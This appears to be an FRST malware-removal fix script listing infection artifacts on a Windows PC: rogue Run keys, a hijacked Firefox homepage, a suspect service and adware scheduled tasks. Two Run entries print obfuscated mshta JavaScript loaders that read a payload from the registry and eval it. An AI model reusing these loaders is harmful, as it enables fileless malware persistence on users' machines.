CreateRestorePoint: (Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe (Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\Run: [WindApp] => "C:\Users\PimpSlap\AppData\Roaming\Store\WindApp\WindApp.exe" /winstartup C:\Users\PimpSlap\AppData\Roaming\Store\WindApp HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\Run: [Selection Tools] => "C:\Users\PimpSlap\AppData\Roaming\WTools\Selection Tools\Selection Tools.exe" /winstartup C:\Users\PimpSlap\AppData\Roaming\WTools HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\Run: [**bfa63c00<*>] => mshta javascript:tg5Av9BK="F7FU0VZ6tm";Q2k=new%20ActiveXObject("WScript.Shell");TvtxAYj0="5EsUzy";nTa5r6=Q2k.RegRead("HKCU\\software\\a5b384e525\\7c6671cf");MLUFn3l="dr9X";eval(nTa5r6);sKu0ZwI="RwVzRS (the data entry has 4 more characters). <===== ATTENTION (Value Name with invalid characters) HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\Run: [**10548e12<*>] => mshta javascript:aRV1SL8ci="1Vhox";U1z3=new%20ActiveXObject("WScript.Shell");Kc5EZWrY="10ceYvbH";O4eIG=U1z3.RegRead("HKCU\\software\\a5b384e525\\7c6671cf");pN6ujpZ6iw="cw";eval(O4eIG);jrwYec53i="SGxNZ (the data entry has 4 more characters). <===== ATTENTION (Value Name with invalid characters) FF Homepage: hxxp://www-searching.com/?site=shyosffdefault&prd=set&s=FB1zamobl03687,6948c77b-0cfd-43cf-98e1-8e5b9952202f FF NewTab: hxxp://www-searching.com/?site=shyosffdefault&prd=set&s=FB1zamobl03687,6948c77b-0cfd-43cf-98e1-8e5b9952202f FF Extension: No Name - C:\Users\PimpSlap\AppData\Roaming\Mozilla\Firefox\Profiles\7ugsozrc.default\extensions\6a1a03975fde4c8690f6b883c36bc1@7d88519bfe704d8cae3851239.com [not found] S2 NetTcpHandler; C:\Users\PimpSlap\AppData\Roaming\NetService\netservice.exe -start [X] C:\Users\PimpSlap\AppData\Roaming\NetService CustomCLSID: HKU\S-1-5-21-1710800545-2821560886-2955275411-1000_Classes\CLSID\{5F63E8CB-8F57-490A-97FE-62BC2F2A5EA4}\InprocServer32 -> no filepath Task: {31718128-098F-4BB9-BAE0-DE20FCC657AB} - System32\Tasks\Installer_smknnodesk => C:\Users\PimpSlap\AppData\Local\Installer\Installsmknnodesk_32556\brakieamo_amobl_inst.exe <==== ATTENTION Task: {A91E6011-C8AE-4509-9EE9-6DB4B2051670} - System32\Tasks\Installer_DSKB => C:\Users\PimpSlap\AppData\Local\Installer\InstallDSKB_27758\brakieamo_amobl_inst.exe <==== ATTENTION Task: {D42682DB-910D-46BF-950F-584A6578B3A2} - System32\Tasks\RegCure Pro_sch_432DFCFC-3664-11E5-885B-00309140240D => C:\Program Files (x86)\ParetoLogic\RegCure Pro\RegCurePro.exe <==== ATTENTION Task: C:\WINDOWS\Tasks\RegCure Pro_sch_432DFCFC-3664-11E5-885B-00309140240D.job => C:\Program Files (x86)\ParetoLogic\RegCure Pro\RegCurePro.exe <==== ATTENTION EmptyTemp: